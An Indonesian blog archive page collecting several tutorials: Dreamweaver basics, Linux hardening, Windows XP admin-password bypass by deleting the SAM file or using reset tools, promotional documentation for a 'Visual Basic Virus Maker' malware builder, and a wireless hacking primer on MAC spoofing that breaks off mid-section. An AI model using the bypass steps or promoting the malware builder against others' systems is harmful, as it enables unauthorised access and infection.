Wednesday, October 28, 2009

Berkenalan Dengan DREAMWEAVER

Artikel singkat ini ditujukan bagi para newbie yang ingin belajar membuat HomePage. Ada begitu banyak aplikasi pembuat HomePage, salah satunya yang populer ialah Macromedia Dreamweaver.

Sekilas Dreamweaver
--------------------
Dreamweamer merupakan tool pembuat homepage yang menggabungkan antara GUI (Graphical User Interface) dan text based. Dreamweamer (mulai versi 4) boleh dibilang merupakan editor HTML pertama dengan fitur - fitur yang sangat lengkap.

Beberapa fungsi-fungsi penting pada Dreamweaver antara lain:
1. Layout View.
2. Team collaboration.
3. Peningkatan kemampuan multimedia.


Element-Element Window Pada Dreamweaver:

*

Document Window: menampilkan dokumen atau halaman web yang sedang kita buat.
Insert Bar: terdiri dari beberapa macam icon untuk memasukkan berbagai macam objek web seperti gambar, layer, dan tabel.
*

Property Inspector: menampilkan property dari objek yang kita pilih didalam dokument.
*

Site Panel: menampilkan semua file dan folder yang merupakan bagian dari website.


Dreamweaver dapat menampilkan dokumen dalam tiga cara, yaitu:
1. Design View: menampilkan dan mengedit dokumen secara visual.
2. Code View:Fasilitas ini memungkinkan kita untuk bisa mengedit langsung
halaman web kita dengan menuliskan kode HTML.
3. Code and Design View: kita bisa melihat Code View dan Design View secara
bersamaan dalam satu tampilan window.


Membuat SITE
------------

*

Hal yang pertama kali harus kita lakukan adalah membuat SITE.Klik menu Site --> New Site
*

Anda akan diberi pilihan apakah anda akan menggunakan server technology (ASP, JSP, PHP, dll) atau tidak.
*

Kotak dialog berikutnya, anda akan diminta untuk menentukan di directory mana situs anda akan disimpan.
*

Next, anda diminta memasukkan informasi tentang bagaimana cara andaterkoneksi ke server.




Bekerja dengan FILE
-------------------

Suatu website bisa terdiri dari satu atau lebih halaman web.Untuk membuat file pada Dreamweaver:

*

Klik kanan pada folder site kita (misal: websiteku) kemudian pilih [New File].
*

Beri nama file yang kita buat.
*

Untuk mengaktifkan suatu file, dobel klik pada nama file pada [Site Panel].
*

Untuk mengganti title website kita, kita bisa mengisikan pada edit box title yang berada dideretan icon pada toolbar di bagian atas Dreamweaver.
*

Memasukkan teks: setelah dokumen kita buka, tempatkan kursor pada Document Window dan kita bisa langsung mengetikkan teks ke dalam dokumen tersebut.
*

Memformat teks: pilih (blok) teks yang akan diformat, kemudian ubah properti pada Property Inspector. Beberapa properti dari teks yang bisa diatur antara lain: format teks,ukuran huruf,bentuk huruf,warna, ketebalan, alignment, bullet dan numbering, dan lain-lain.
*

Kita bisa memasukkan objek-objek kedalam halaman situs kita. Objek-objek yang bisa kita masukkan antara lain: gambar, tabel, frame,form, flash, dan lain - lain. Ada beberapa cara memasukkan objek pada dreamweaver yaitu:

1. Pada Insert Bar, pilih objek yang ingin kita masukkan. Kemudian ikutilah

instruksi yang ada.
2. Pilih menu Insert kemudian pilih objek yang ingin anda masukkan. Perlu

anda ketahui bahwa pada Dreamweaver, teks juga dianggap sebagai objek.


*

Untuk mengubah format dari suatu objek:
1. Pilih objek yang akan diformat.
2. Pada Property Inspector, atur property yang ada sesuai dengan yang
diinginkan.

*

Page Properties
Secara default, halaman web kita mempunyai title Untitle Document dan tidak mempunyai background. Untuk mengeditnya, bisa dilakukan dengan mengakses Page Properties --> klik menu Modify, kemudian pilih Page Properties. Atau bisa juga dengan cara meletakkan kursor mouse pada dokumen, kemudian klik kanan dan pilih Page Properties. Beberapa property yang bisa diedit: warna latar belakang dokumen, warna teks, gambar pada latar belakang, level transparan dari gambar, dan lain-lain.

*

Membuat Tabel
1. Klik menu Insert --> Table
2. Pilih icon Insert Table pada panel Insert Bar --> Tables.

*

11. Membuat Link
1. Pilih teks, gambar, atau objek yang ingin kita jadikan sebagai
link.
2. Pilih menu Modify --> Make Link. Akan muncul kotak dialog Select
File.
3. Ketikkan alamat URL dari tujuan link kita kedalam teks box URL
atau dengan memilih file menggunakan kotak browser yang ada.
Setelah selesai klik OK.
Catatan: Bila file yang kita pilih berada di luar dari folder root
website kita maka akan muncul dialog yang menanyakan apakah kita
akan mengcopy file tersebut kedalam folder root dari website kita.

Sekian, semoga bisa dijadikan sebagai bekal dasar bagi anda yang baru akan memulai membuat web.

Mengamankan Linux Anda

--< Table Of Contents: -------------------------------------------------------------
I. Preface
II. Apa saja yang sebaiknya anda lakukan??
01. Pengamanan terhadap mode single user
02. Melakukan pemeriksaan file-file log pada Linux
03. Melakukan backup
04. Memproteksi perintah-perintah linux tertentu
05. Merestriksi perintah su
06. Mengkonfigurasi file /etc/inittab dan file /etc/fstab
07. Mensetting unmask dan time out
08. Mengkonfigurasi file /etc/issue dan issue.net serta file/etc/securetty
09. Merestriksi diirektori /etc/rc.d dari user selain root
10. Mengkonfigurasi file /etc/sysctl.conf
III. Penutup
-------------------------------------------------------------------------------------





I. Preface
-----------


Linux, yang disebut-sebut sebagai "The Hackers OS", dewasa ini menjadi Operating System yang populer. Perjuangan para pecinta Open Source dalam Me-Linux-kan masyarakat tampaknya tidak sia-sia. Linux disukai karena FREE, secure dan tampilan grafisnya yang kini kian menawan saja. Walaupun sudah diakui ketangguhannya, namun bukan berarti Linux 100% secure. Tentu masih ada beberapa celah di dalamnya yang bisa dijadikan sebagai jalan masuk bagi pihak-pihak yang tidak bertanggungjawab (hayoo... siapa yang suka iseng... ^_^)

Karena itulah, dalam tutorial ini, saya bermaksud untuk berbagi informasi mengenai bagaimana cara-cara mengamankan mesin Linux anda. Semoga bermanfaat.


II. Apa saja yang sebaiknya anda lakukan??
------------------------------------------

-----[01]. Pengamanan terhadap mode Single User


Pertama-tama, kita harus membuat password lilo. Edit dan tambahkan option-option di bawah ini pada file /etc/lilo.conf (file utama pengaturan option-option pada LILO) :
Contoh file /etc/lilo.conf

boot=/dev/hda
map=/boot/map
install=/boot/boot.b
prompt
timeout=00 #tambahkan !
default=linux
restricted # tambahkan !
password=t3rs3r4h # tambahkan !
image=/boot/vmlinuz-2.2.12-20
label=linux
initrd=/boot/initrd-2.2.12-10.img
root=/dev/sda6
read-only

:: Keterangan parameter selengkapnya:

boot=
Memberitahu device yang memiliki boot sector. Boot sector dibaca dari device ini dan di mount sebagai root.

Linear
Mengenerate linear sector addrress. Lihat dokumentasi LILO.

install=
Menginstal file yang telah ditentukan sebagi boot sector yang baru. Jika install tidak dipakai, /etc/lilo/boot.b dipakai sebagi default.

message=
Untuk menampilkan file teks, besarnya maksimum 65,535 byte.

verbose=
Menampilkan progress reporting. Option lain seperti -v dan -q. Lihat dokumentasi LILO.

backup=
Menyalin boot sector asli ke file .

force-backup
Sama dengan backup. Option ini menimpa salinan backup yang telah dibuat dan akan mengabaikan option backup bila keduanya dipakai.

Prompt
Meminta masukan saat boot.

timeout=
Mengeset waktu tunggu keyboard sebelum menjalankan option berikutnya. Defaultnya 5 detik. Masukkan value 0 jika ingin LILO menunggu sampai ada masukkan darii keyboard.

serial=
Mengijinkan masukan dari serial line dan keyboard ke LILO.

ignore-table
Mengabaikan tabel partisi yang corrupt.

password=
Memasang password untuk melindungi boot images.

restricted digunakan bersama dengan option password, restricted di sini berarti password lilo hanya akan berlaku/ditanyakan jika user MENULISKAN/MENGGUNAKAN paramater atau option tertentu pada saat booting linux (misalkan LILO: linux –s, linux root=/dev/hda1 rw init=/bin/sh, dll). Dan password TIDAK akan ditanyaakan jika kita booting TIDAK MENGGUNAKAN parameter (misalkan Lilo: linux).
password=t3rs3r4h berisi password lilo untuk booting (dalam hal ini berarti password lilonya adalah t3rs3r4h). Baca baca manualnya dengan mengetik perintah:
[root]# man lilo.conf

Setelah itu settinglah agar file /etc/lilo.conf hanya dapat terbaca oleh root.
[root]# chmod 600 /etc/lilo.conf

Jangan lupa untuk mengupdate konfigurasi /etc/lilo.conf yang baru.
[root]# /sbin/lilo

dan buat agar file /etc/lilo.conf bersifat immute (sehingga file /etc/lilo.conf ini tidak akan bisa diubah/diedit tanpa melakukan un-immute) :
[root]# chattr +i /etc/lilo.conf

Untuk melakukan perubahan/mengedit file /etc/lilo.conf harus dilakukan un-immute terlebih dahulu dengan perintah :
[root]# chattr -i /etc/lilo.conf



-----[02]. Melakukan pemeriksaan file-file log pada Linux


Cobalah periksa file-file log Linux anda (terutama yang terletak di direktori /var/log).
[root]# less /var/log/messages
[root]# less /var/log/maillog
[root]# less /var/log/xferlog



-----[03]. Melakukan backup

Seringkali penyusup masuk ke dalam sistem dan merusak dengan menghapus berkas/data yang dapat ditemui. Jika intruder ini berhasil menjebol sistem dan masuk sebagai super user (administrator), maka ada kemungkinan dia dapat menghapus seluruh berkas. Untuk itu, adanya backup yang dilakukan secara rutin merupakan sebuah hal yang esensial.


Untuk sistem yang sangat esensial, secara berkala perlu dibuat backup yang letaknya berjauhan secara fisik. Hal ini dilakukan untuk menghindari hilangnya data akibat bencana seperti kebakaran, banjir, gempa dan lain lain. Apabila data-data dibackup akan tetapi diletakkan pada lokasi yang sama, kemungkinan data akan hilang jika tempat yang bersangkutan mengalami bencana


Backup lebih baik dilakukan secara rutin dan secara menyeluruh. Kita bisa melakukan backup tiap hari misalnya atau tiap jangka waktu tertentu sesuai dengan kebutuhan dan tuntutan keamanan sistem kita. Sebagai medianya dapat digunakan harddisk, atau tape (lebih baik). Untuk melakukan backup direktori home (misal : /home) dan di bawahnya pada file /root/bkhome.tar.gz di hard sik yang sama, gunakan perintah berikut :

[root]# tar –cvzf ~/bkhome.tar.gz /home


Untuk keamanan yang lebih baik, ada beberapa file pada Linux yang perlu untuk kita konfigurasi. Kebanyakan file yang akan kita manipulasi ada di direktori /etc karena file-file konfigurasi terletk disana.



-----[04]. Memproteksi perintah-perintah linux tertentu

Kita bisa juga memproteksi/merestriksi perintah-perintah tertentu agar cuma bisa dijalankan oleh root. Ada kalanya perintah/program yang diinstal pada linux harus dilindungi agar tidak disalah gunakan oleh user lain sehingga dapat mengganggu keamanan sistem atau mengganggu user yang lain (misal : rpm, wall, mc, nmap, repeat, dll). Gunakan perintah chmod agar perintah tersebut cuma bisa dieksekusi oleh root (700), misalnya untuk merestriksi perintah rpm :
[root]# chmod 700 /bin/rpm
Cobalah untuk merestriksi perintah-perintah lainnya (contoh : wall, repeat, reboot, shutdown, poweroff, halt, dll).



-----[05]. Merestriksi perintah su (substitute user)


Untuk meningkatkan keamanan, kita perlu untuk membatasi jumlah user/menghalangi user tertentu agar tidak bisa menjadi root dengan perintah su (substitute user). Edit file /etc/pam.d/su :
[root]# vi /etc/pam.d/su

auth required /lib/security/pam_pwdb.so shadow nullok
account required /lib/security/pam_pwdb.so
password required /lib/security/pam_cracklib.so
password required /lib/security/pam_pwdb.so shadow use_authtok nullok
session required /lib/security/pam_pwdb.so
session optional /lib/security/pam_xauth.so

tambahkan 2 baris berikut ini :
auth sufficient /lib/security/pam_rootok.so debug
auth required /lib/security/pam_wheel.so group=wheel

Baris di atas mengandung arti hanya anggota group wheel (user dengan gid = 10) saja yang bisa menjalankan perintah su menjadi root. Setelah itu, gunakan perintah berikut untuk memilih user-user mana saja yang bisa memakai su untuk root (bisa juga melalui userconf) :
[root]# usermod -G10 hakim

G adalah supplementary groups di mana user juga merupakan anggota dari group tersebut. “10” adalah nomor id dari group “wheel” dan hakim adalah nama usernya. Dengan perintah di atas, maka user dengan nama hakim akan dimasukkan ke dalam grup wheel. Untuk mengeceknya dapat digunakan perintah id :
[root]# id hakim

-----[06]. Mengkonfigurasi file /etc/inittab dan file /etc/fstab


:: Konfigurasi file /etc/inittab :


#
# inittab This file describes how the INIT process should set up
# the system in a certain run-level.

# Default runlevel. The runlevels used by RHS are:
# 0 - halt (Do NOT set initdefault to this)
# 1 - Single user mode
# 2 - Multiuser, without NFS (The same as 3, if you do not have networking)
# 3 - Full multiuser mode
# 4 - unused
# 5 - X11
# 6 - reboot (Do NOT set initdefault to this)
#
id:3:initdefault:

# System initialization.
si::sysinit:/etc/rc.d/rc.sysinit

l0:0:wait:/etc/rc.d/rc 0
l1:1:wait:/etc/rc.d/rc 1
l2:2:wait:/etc/rc.d/rc 2
l3:3:wait:/etc/rc.d/rc 3
l4:4:wait:/etc/rc.d/rc 4
l5:5:wait:/etc/rc.d/rc 5
l6:6:wait:/etc/rc.d/rc 6

# Things to run in every runlevel.
ud::once:/sbin/update

# Trap CTRL-ALT-DELETE
# ca::ctrlaltdel:/sbin/reboot -t3 -r now

# When our UPS tells us power has failed, assume we have a few minutes
# of power left. Schedule a shutdown for 2 minutes from now.
# This does, of course, assume you have powerd installed and your
# UPS connected and working correctly.
pf::powerfail:/sbin/shutdown -f -h +2 "Power Failure; System Shutting Down"

# If power was restored before the shutdown kicked in, cancel it.
pr:12345:powerokwait:/sbin/shutdown -c "Power Restored; Shutdown Cancelled"

# Run gettys in standard runlevels
1:2345:respawn:/sbin/mingetty tty1
2:2345:respawn:/sbin/mingetty tty2
3:2345:respawn:/sbin/mingetty tty3
4:2345:respawn:/sbin/mingetty tty4
5:2345:respawn:/sbin/mingetty tty5
6:2345:respawn:/sbin/mingetty tty6

# Run xdm in runlevel 5
# xdm is now a separate service
x:5:respawn:/etc/X11/prefdm -nodaemon


KETERANGAN KONFIGURASI :

id:3:initdefault:
Kita bisa mengeset default run level sehingga secara otomatis akan booting dengan run level yang diinginkan (Jangan menggunakan run level 0 (halt) dan 6 (reboot)). Konfigurasi di atas berarti default runlevel adalah 3 (Full Multi User).

# Trap CTRL-ALT-DELETE
ca::ctrlaltdel:/sbin/reboot
Dengan PERINTAH di atas maka tombol CTRL-ALT-DELETE akan dianggap sebagai perintah reboot. Untuk mendisablenya dapat dilakukan dengan cara menambahkan tanda komentar (#) sehingga perintah tersebut tidak akan dieksekusi :
# Trap CTRL-ALT-DELETE
# ca::ctrlaltdel:/sbin/reboot

# Run gettys in standard runlevels
Di bawah komentar ini berisi tty yang diaktifkan pada server yang secara default akan ada enam (tty1 – tty6). Virtual console ini dapat kita kurangi (misal : menjadi lima) dengan cara menambahkan tanda komentar (#):
# 6:2345:respawn:/sbin/mingetty tty6

Jangan lupa jalankan perintah berikut agar perubahan yang kita lakukan dibaca ulang :
[root]# /sbin/init q
Manual file /etc/inittab dapat dilihat dengan perintah :
[root]# man inttab


:: Konfigurasi /etc/fstab

File ini berisi filesistem-filesistem yang dimount secara otomatis pada saat sistem startup. Jika kita membagi partisi sistem dengan optimum, tentu akan lebih memudahkan dalam memanage sistem kita. Keuntungan dari multiple partition antara lain :
• Memudahkan mengatur back up dan upgrade
• Lebih cepat dalam proses booting (kasus tertentu)
• Kemampuan mengontrol file system yang dimount
• Proteksi dari SUID program
Kita bisa membuat option-option tertentu (misal noexec, nodev, dan nosuid) untuk partisi-partisi yang telah kita buat. Contoh isi file /etc/fstab :
/dev/hda11 / ext2 defaults 1 1
/dev/hda1 /boot ext2 nodev,noquota 1 2
/dev/hda8 /home ext2 exec,nodev,nosuid,rw,usrquota 1 2
/dev/hdc1 /var/www ext2 exec,nodev,suid,rw 1 2
/dev/hdc2 /var/ftp ext2 exec,nodev,suid,rw 1 2
/dev/hdc3 /cache ext2 exec,nodev,suid,rw 1 2
/dev/hdc4 /home2 ext2 exec,nodev,nosuid,rw,usrquota 1 2
/dev/cdrom /mnt/cdrom iso9660 noauto,owner,ro 0 0
/dev/hda9 /usr ext2 exec,dev,suid,rw 1 2
/dev/hda10 /var ext2 exec,dev,suid,rw 1 2
/dev/fd0 /mnt/floppy auto noauto,owner 0 0
none /proc proc defaults 0 0
none /dev/pts devpts gid=5,mode=620 0 0
/dev/hda5 swap swap defaults 0 0
/dev/hda6 swap swap defaults 0 0
/dev/hda7 swap swap defaults 0 0

defaults berarti membolehkan semuanya (quota, read-write, and suid) dalam partisi tersebut. noquota berarti tidak mengeset users quotas dalam partisi ini. nosuid berarti tidak mengeset SUID/SGID access dalam partisi ini. nodev berarti tidak mengeset character atau special devices access dalam partisi ini. noexec berarti tidak mengeset eksekusi binary apapun dalam partisi ini. quota membolehkan users quotas dalam partisi ini. ro membolehkan read dalam partisi ini. rw membolehkan read-write dalam partisi ini. suid membolehkan SUID/SGID access dalam partisi ini. Pastikan untuk menambahkan option nosuid pada partisi-partisi tertentu terutama partisi home untuk menghindari kemungkinan pengaksesan root dengan program SUID. Agar lebih jelas, dapat lihat manualnya dengan perintah :
[root]# man fstab
Yang perlu kita perhatikan di sini adalah mengaktifkan nosuid, yang berarti tidak mengizinkan adanya file suid (misalkan pada direktori /home).





-----[07]. Mensetting unmask dan time out



::unmask

Perintah umask digunakan untuk menentukan mode penciptaan file baku/secara otomatis pada sistem. Jika file diciptakan tanpa mengindahkan setting permisi, pemakai secara tidak sengaja mungkin dapat memberi permisi membaca atau menulis kepada seseorang yang tidak seharusnya memiliki permisi ini. Umumnya setting umask mencakup 022, 027, dan 077 (yang paling terbatas). Normalnya umask diset dalam /etc/profile, sehingga berlaku untuk semua pemakai sistem. Pastikan untuk membuat umask root 077, yang akan meniadakan permisi membaca, menulis, dan mengeksekusi bagi pemakai lain, kecuali dirubah secara eksplisit menggunakan chmod.

::Pembatasan waktu (time out)
Kita bisa mengeset berapa lama waktu logout secara otomatis jika ada shell yang tidak dipakai selama jangka waktu tertentu (time out), misal = 5 menit = 300 detik. Edit file /etc/profile (File ini berisi environment dan startup program). Pada bagian :
TMOUT=7200
ganti 7200 dengan 300
Dengan begitu jika ada console yang tidak kita gunakan dalam waktu tertentu/kita lupa tidak menutupnya maka secara otomatis akan menutup dalam waktu 300 detik.




-----[08]. Mengkonfigurasi file /etc/issue dan issue.net serta file/etc/securetty


::File etc/issue dan issue.net

File ini akan menampilkan jenis sistem operasi kita (sekaligus kernelnya) pada waktu telnet (file /etc/issue.net) dan waktu login secara lokal/langsung (file /etc/issue). Lebih baik kita mengganti isi file /etc/issue dan /etc/issue.net, sehingga dapat meminimalkan kerawanan keamanan jaringan.
[root]# vi /etc/issue
[root]# vi /etc/issue.net
Contoh isi file /etc/issue dan /etc/issue.net :
Welcome to spyrozone.net

::File /etc/securetty
File ini mengizinkan TTY device mana saja yang dapat dipakai oleh root untuk login. Edit file /etc/securetty dan disable TTY device dengan memberi tanda comment pada awal baris (#).


tty1 menjadi #tty1
tty2 #tty2
tty3 #tty3
tty4 #tty4
tty5 #tty5
tty6 #tty6
tty7 #tty7
tty8 #tty8



Dengan demikian tidak ada user yang bisa langsung menggunakan root untuk login, tetapi harus menggunakan user biasa baru setelah itu menggunakan program su (substitute user) untuk berbah menjadi root.




-----[09]. Proteksi Direktori /etc/rc.d/*


Direktori /etc/rc.d/ ini sangat penting karena file-file pada direktori akan dijalankan ketika sistem startup/booting. Khusus direktori /etc/rc.d/init.d/* berisi servis-servis yang akan dijalankan pada saat startup sebagai daemon. Pastikan direktori ini tidak bisa diakses oleh user selain root :
[root]# chmod -R 700 /etc/rc.d/*




-----[10]. Konfigurasi file /etc/sysctl.conf


File ini merupakan file konfigurasi kernel parameter pada saat run time. Ada baiknya file ini juga kita konfigurasikan, misal :
# Enable ignoring ping request (untuk mengkonfigurasi agar sistem kita ignore terhadap ping request)
net.ipv4.icmp_echo_ignore_all = 1
# Enable ignoring broadcasts request (agar sistem ignore terhadap broadcast request)
net.ipv4.icmp_echo_ignore_broadcasts = 1
# Enable TCP SYN Cookie Protection (agar sistem terlindung dari SYN attack, yaitu salah satu jenis Denial of Service Attack (Dos))
net.ipv4.tcp_syncookies = 1
# Disable ICMP Redirect Acceptance (melindungi dari kemungkinan perubahan routing tables)
net.ipv4.conf.all.accept_redirects = 0
# Enable always defragging Protection (harus diaktifkan jika sistem kita adalah gateway untuk IP Masquerading)
net.ipv4.ip_always_defrag = 1

Agar konfigurasi di atas dieksekusi, jangan lupa untuk menjalankan perintah berikut :

[root]# /etc/rc.d/init.d/network restart

atau bisa juga dengan perintah :

[root]# service network restart







III. Penutup

------------



Wah, sebenarnya masih banyak lagi hal-hal yang harus anda lakukan untuk meningkatkan keamanan mesin anda. Namun, sepertinya kita harus berpisah sampai disini karena keterbatasan waktu ;)



Sampai jumpa... ^_^

Recovery password Windows XP

Maksud hati ingin membuat password admin Windows XP yang secure, nggak gampang ditebak. Namun yang terjadi malah lupa password. Nah, jika anda dalam kondisi ini, nggak usah panik atau buru-buru buang-buang waktu untuk melakukan Install Ulang. Cobalah beberapa solusi berikut:



1. Menghapus file SAM

---------------------

Persiapkan CD Instalasi Windows dan bootinglah menggunakan CD tersebut. Masuk ke Windows Recovery Console lalu pergilah ke lokasi berikut:

C:\WINDOWS\SYSTEM32\CONFIG

Hapuslah file SAM yang ada didalamnya. Aksi ini akan mereset semua user yang ada di komputer anda. Aksi ini akan menghapus semua user account di komputer anda, termasuk Administrator sehingga nantinya password Admin akan kosong.

2. Download bd040116.zip dari:

http://home.eunet.no/%7Epnordahl/ntpasswd/bootdisk.html

Utility gratisan yang bisa mengubah semua password OS berbasis NTFS seperti Windows NT, 2000, XP. Utility ini akan membuat bootdisk sendiri.



3. WSINTERNALS ERD COMMANDER

----------------------------

Gunakan WSINTERNALS ERD COMMANDER dari www.wsinternals.com Program itu akan membuat password Admin baru.

Dokumentasi VB+ViMaker32 (Visual Basic Virus Maker)



---< Download : Member area http://www.spyrozone.net
---< Tentang Program


VB+ViMaker32 (Visual Basic Virus Maker) adalah sebuah software yang diciptakan untuk membuat program komputer yang berbasiskan security. Software ini merupakan sebuah editor yang berisi kode-kode untuk menjalankan suatu aksi/tindakan tertentu sesuai dengan kode yang diberikan. Software ini dapat membuat program (untuk security) yang bertujuan untuk melakukan test pada sistem komputer, mengubah berbagai pengaturan sistem, serta dapat digunakan sebagai program pembasmi malware yang telah menjangkiti komputer dengan tambahan berbagai modul/plugins.


Software ini juga dapat melakukan simulasi serangan program jahat (malware) serta menguji ketahanan sistem terhadap suatu serangan malware dan dapat mengembalikan pengaturan sistem yang telah diubah oleh suatu malware atau program tertentu. Walaupun software ini bertajuk 'Virus Maker', bukan berarti software ini hanya dapat membuat program jahat (malware) melainkan juga dapat digunakan untuk melawan program jahat (malware) lainnya yang telah ada dan aktif di dalam sistem dengan menggunakan teknik 'Malware vs Malware' atau dengan kata lain membasmi malware dengan malware (program) tetapi yang dapat dikendalikan. Sehingga anda dapat menggunakan software ini jika antivirus yang digunakan tidak dapat mendeteksi/membasmi malware yang aktif dikomputer anda atau minimal mengembalikan pengaturan sistem yang telah diubah oleh malware.

Software ini diciptakan menggunakan bahasa pemrograman 'Visual Basic', oleh karena itu untuk dapat menggunakan dan menjalankan software dan program yang diciptakannya, didalam sistem anda harus terdapat file runtime milik Visual Basic yaitu: MSVBVM60.dll. Software ini dibuat sebagai pengganti dari software sejenis terdahulu yang gagal dirilis yaitu: BCVCKIT32 (Bla@ck Cyber Virus Cre@tor Kit). Software ini telah mengalami berbagai revisi dan penggantian nama, dimulai dari: MesMew Virus Compiler (Tidak dirilis), V-Rez@constructor (RC01) dan terakhir VB+ViMaker32. Dengan pengembangan yang terus dilakukan, software ini telah menjadi sebuah tools/alat bantu yang sangat berguna (jika tidak disalahgunakan).



---< Fitur Program

Pada versi ini terdapat berbagai macam fitur, antara lain:

1). Integrated Compiler System : Software ini telah memiliki sebuah 'Internal Compiler' Built-In yang terintegrasi dengan program utama sehingga proses compile project dan menjadikannya file EXE (Executable) menjadi lebih cepat dan lebih efisien.

2). Integrated Debugger System: Software ini juga memiliki sebuah 'Internal Debugger' yang terintegrasi dengan Compiler. Dengan penyatuan antara Compiler dan Debugger kedalam satu program akan memudahkan proses pemeriksaan kode program. Keuntungan lain yang didapat dengan penyatuan ini adalah jika terjadi kesalahan penulisan kode pada editor dapat segera diketahui dan dapat menunjukan dengan detail pada baris kode yang salah.

3). Automatic Syntax Coloring: Fitur ini akan memberikan warna-warna tertentu pada 'keyword' dan syntax program. Dengan pemberian warna ini maka penulisan keyword/syntax kode program kedalam editor menjadi lebih mudah untuk dimengerti. Pemberian warna pada 'keyword'/syntax akan memudahkan dalam pembedaan antara fungsi dari kode tersebut.

4). Project Code Analyzer: Fitur ini akan melakukan analisa terhadap kode-kode yang anda berikan. Gunakan fitur ini untuk memeriksa kode pada proyek sebelum melakukan proses compile. Fitur Project Code Analyzer ini terintegrasi dengan Debugger.

5). Project Code Encryptor: Fitur ini akan melakukan proses enskripsi terhadap source code pada proyek yang telah anda ciptakan, sehingga keamanan kode proyek dapat lebih terjaga.

6). Smart Detection Checker: Fitur ini akan melakukan deteksi terhadap kode program yang telah anda tuliskan pada editor. Fitur ini terintegrasi dengan fitur Automatic Syntax Coloring sehingga proses pemeriksaan syntax dan keyword pada editor menjadi lebih cepat.

7). Code Refreshing: Fitur ini akan merefresh (reload) kembali source code pada proyek dan memeriksa kembali kode-kode pada editor. Fitur ini terintegrasi dengan fitur Automatic Syntax Coloring dan fitur Smart Detection Checker.

8). Registry Action Selector: Fitur ini berisi kumpulan database yang memuat semua pengaturan/settingan registry yang dapat diubah. Anda masih dapat mengubah database ini dengan menambahkan atau memodifikasi nilai yang diberikan. Gunakan fitur ini untuk mendapatkan/mengubah/mengetahui suatu setting pada registry.

9). Window Caption Selector: Fitur ini berisi kumpulan database yang memuat semua judul (Caption) pada jendela (Window). Anda hanya tinggal memilih daftar caption pada database dengan menceklistnya. Gunakan fitur ini untuk memilih daftar Caption Window yang telah disediakan.

10). Dokumentasi: Fitur ini berisi semua keterangan dan informasi tentang penggunaan dan semua hal yang berkaitan dengan software ini. Fitur ini adalah fitur yang sedang anda baca saat ini.

11). Version History (Sejarah Versi): Fitur ini berisi daftar pengembangan software ini dari awal diciptakan hingga mencapai versi terbaru.

Perkenalan WIRELESS HACKING

----[ Table of Contents

[1]. Preface

[2]. Pengenalan Wireless Lan (WLAN)

[3]. Ancaman-Ancaman yang Mungkin Terjadi

[4]. Amankan Jaringan Wireles Anda!!

[5]. Istilah-istilah



-------------------------------------------

[1]. Preface

----------------------------------

Hmm.. we'll learn all about Wireless hacking. All?? nggak juga sich, hehehe.. maklum, ilmu sang penulis masih sangat terbatas. So, bagi yang udah expert dalam bidang ini, koreksi yach.. ;)







[2]. Pengenalan Wireless LAN (WLAN)
-----------------------------------

Wireless LAN sering juga disebut sebagai Jaringan Nirkabel atau jaringan Wireless. Wireless Local Area Network (WLAN) merupakan jaringan komputer yang menggunakan gelombang radio sebagai media transmisi data. Dalam hal ini berarti informasi/data ditransfer dari satu komputer ke komputer lain dengan menggunakan gelombang radio.


Semuanya berawal dari bermunculannya peralatan yang berbasis gelombang radio (walkie talkie, telepon cordless, ponsel, dsb..). Dari sinilah muncul pemikiran untuk menjadikan komputer sebagai sesuatu yang mudah dibawa sehingga bisa dipergunakan dimana saja saat dibutuhkan. Hal-hal seperti inilah yang akhirnya mendorong pengembangan teknilogi wireless untuk jaringan komputer.





:: SEJARAH WLAN

---------------


|-[ Tahun 1997:

Sebuah lembaga independen bernama IEEE membuat spesifikasi/standar WLAN pertama yang diberi kode 802.11. Peralatan yang sesuai standar 802.11 dapat bekerja pada frekuensi 2,4GHz, dan kecepatan transfer data (throughput) teoritis maksimal 2Mbps. Namun sayangnya, peralatan yang mengikuti spesifikasi 802.11 kurang bisa diterima di pasar. Througput sebesar ini dianggap kurang memadai untuk aplikasi multimedia dan aplikasi kelas berat lainnya.


|-[ Juli 1999:

IEEE kembali mengeluarkan spesifikasi baru yang bernama 802.11b. Kecepatan transfer data teoritis maksimal yang dapat dicapai adalah 11 Mbps. Kecepatan tranfer data sebesar ini sebanding dengan Ethernet tradisional (IEEE 802.3 10Mbps atau 10Base-T). Peralatan yang menggunakan standar 802.11b juga bekerja pada frekuensi 2,4Ghz. Namun masih ada kekurangan pada peralatan wireless yang bekerja pada frekuensi ini yaitu kemungkinan terjadinya interferensi dengan peralatan-peralatan lain yang menggunakan gelombang radio pada frekuensi yang sama.


Disaat yang hampir bersamaan, IEEE kemudian membuat spesifikasi 802.11a yang menggunakan teknik berbeda. Frekuensi yang digunakan 5Ghz, mendukung kecepatan transfer data teoritis maksimal sampai 54Mbps. Akan tetapi Gelombang radio yang dipancarkan oleh peralatan 802.11a relatif sukar menembus penghalang seperti dinding dan lain sebagainya. Jarak jangkau gelombang radio pun relatif lebih pendek dibandingkan 802.11b. Secara teknis, 802.11b tidak kompatibel dengan 802.11a. Namun saat ini sudah cukup banyak pabrik hardware yang membuat peralatan yang mendukung kedua standar tersebut.


|-[ Tahun 2002:

IEEE membuat spesifikasi baru yang dapat menggabungkan kelebihan 802.11b dan 802.11a. Spesifikasi baru ini diberi kode 802.11g, bekerja pada frekuensi 2,4Ghz dengan kecepatan transfer data teoritis maksimal 54Mbps. Peralatan 802.11g kompatibel dengan 802.11b sehingga bisa saling dipertukarkan.





[3]. Ancaman-Ancaman yang Mungkin Terjadi

-----------------------------------------

Setiap ada teknologi baru yang ditemukan, selalu ada ancaman yang timbul. Hal ini memang tidak dapat dielakkan. Begitu juga dalam WLAN. Berikut ini adalah ancaman-ancaman yang mungking timbul:

:: Pencurian Identitas

-----------------------
Penggunaan MAC ADDRESS (Media Access Control) untuk menentukan komputer mana yang berhak mendapatkan koneksi dari jaringan nirkabel sudah sejak lama dilakukan. Akan tetapi, tidak dapat dipungkiri, hal ini sebenarnya sebenarnya tidak memberikan perlindungan yang berarti dalam sebuah jaringan komputer manapun.



Penyusup bisa saja melakukan pencurian identitas dengan teknik spoofing Mac Address untuk menggandakan SSID (Service Set Identifier) dan MAC Address yang merupakan PIN akses jaringan. Penyusup mampu menggunakan SSID dan MAC dari komputer lain untuk melakukan tindakan-tinadkan yang merugikan (misalnya saja pencurian bandwidth).


Walaupun toh suatu jaringan telah dilengkapi dengan enkripsi data atau VPN (Virtual Private Network), MAC Address masih bisa dilacak dan di-spoof. Informasi mengenai MAC Address bisa diperoleh dari program seperti Kismet. Untuk melakukan pencurian identitas, penyusup akan menggunakan program spoofing atau mengubahnya melalui Registry (Windows)

:: Man-in-the-Middle

--------------------
